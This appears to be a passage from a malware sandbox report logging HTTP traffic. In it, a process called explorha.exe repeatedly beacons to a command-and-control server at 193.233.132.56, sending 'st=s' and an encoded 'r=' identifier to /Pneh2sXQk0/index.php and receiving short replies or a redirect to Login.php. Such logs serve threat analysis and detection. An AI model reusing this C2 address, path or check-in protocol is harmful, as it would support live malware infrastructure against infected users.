                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:26.984457016 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49770 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe

Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:27.334340096 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:29:27.581065893 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Apr 19, 2024 03:29:27.581820011 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:27.832570076 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49771 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe

Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:28.233938932 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:29:28.476804018 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Apr 19, 2024 03:29:28.555151939 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:28.810861111 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      16 | 192.168.2.5 | 49772 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:29.255553007 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:29.498307943 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:29.501691103 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:29.748577118 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      17 | 192.168.2.5 | 49775 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:30.100778103 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:30.349416018 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:30.350960970 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:30.604402065 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      18 | 192.168.2.5 | 49779 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:30.961292028 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:31.208998919 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:31.212039948 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:31.464279890 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 49785 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:31.835582972 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:29:32.080806017 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:29:32.082199097 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:32.332559109 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 49792 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:32.692337036 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:29:32.936714888 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:29:32.937767029 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:33.189093113 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 49793 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:33.875886917 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:29:34.123487949 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:29:34.171626091 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:34.423477888 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 49794 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:35.837363005 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:29:36.088021994 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:29:36.117934942 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:36.372840881 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 49796 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:36.893942118 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:29:37.142980099 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:29:37.148803949 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
